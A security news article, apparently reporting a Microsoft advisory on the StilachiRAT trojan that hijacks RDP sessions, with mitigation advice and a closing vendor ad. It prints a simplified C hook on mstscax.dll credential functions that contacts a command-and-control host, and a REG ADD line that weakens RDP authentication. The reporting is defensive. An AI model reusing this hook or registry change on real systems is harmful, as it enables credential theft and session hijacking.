Microsoft has issued an urgent security advisory regarding a newly discovered malware strain called StilachiRAT, which specifically targets and exfiltrates data from Remote Desktop Protocol (RDP) sessions.
The sophisticated malware has been observed in targeted attacks against financial institutions, government agencies, and critical infrastructure organizations across multiple regions.
Security experts warn that this new threat possesses advanced capabilities to capture credentials, keystrokes, and even hijack ongoing RDP sessions without detection.
Initial infection typically occurs through phishing emails containing malicious attachments or via compromised websites serving exploit kits.
Once executed on a victim’s system, StilachiRAT establishes persistence by creating a scheduled task that runs at system startup and modifying registry keys to ensure it remains undetected by security solutions.
Microsoft Security researchers identified the malware’s distinctive command and control infrastructure, which utilizes a combination of encrypted DNS tunneling and HTTPS callbacks to exfiltrate stolen data.
Analysis of infected systems revealed that StilachiRAT employs sophisticated anti-analysis techniques, including virtual machine detection and debugger evasion capabilities.
The malware’s primary function focuses on intercepting RDP session data by hooking into the Windows Remote Desktop Services API.
This allows it to capture login credentials, monitor session activities, and even record entire remote sessions for later review by attackers.
What makes StilachiRAT particularly dangerous is its ability to operate silently without disrupting legitimate user connections.
Organizations with remote workers or administrators who frequently utilize RDP face significant risks from this threat, as compromised sessions can lead to lateral movement within networks, data theft, and potential ransomware deployment.
Technical Analysis and Mitigation
The core of StilachiRAT’s RDP session hijacking functionality is implemented through a technique called API hooking.
The malware injects itself into the mstsc.exe process and intercepts functions related to credential handling and encryption.
Below is a simplified representation of the hook implementation found in the malware:-
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
switch (ul_reason_for_call) {
case DLL_PROCESS_ATTACH:
// Hook RDP-related APIs
HookFunction("mstscax.dll", "CredentialsCacheInitialize",
(PVOID)HookedCredentialsCacheInitialize);
HookFunction("mstscax.dll", "EncryptCredentials",
(PVOID)HookedEncryptCredentials);
// Set up exfiltration channel
InitializeC2Communication("c2.stilachi-server.net", 8443);
break;
}
return TRUE;
}.webp)
When analyzing infected systems, Microsoft discovered a distinctive registry modification that indicates StilachiRAT presence:
REG ADD "HKCUSoftwareMicrosoftTerminal Server ClientDefault" /v "AuthenticationLevelOverride" /t REG_DWORD /d "0" /f.webp)
Microsoft recommends organizations implement multi-factor authentication for RDP connections, restrict RDP access to trusted networks, keep systems fully patched, and deploy endpoint detection and response solutions capable of identifying API hooking techniques.
Additionally, monitoring for unusual RDP connection patterns and enforcing network segmentation can help limit the impact of potential compromises.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
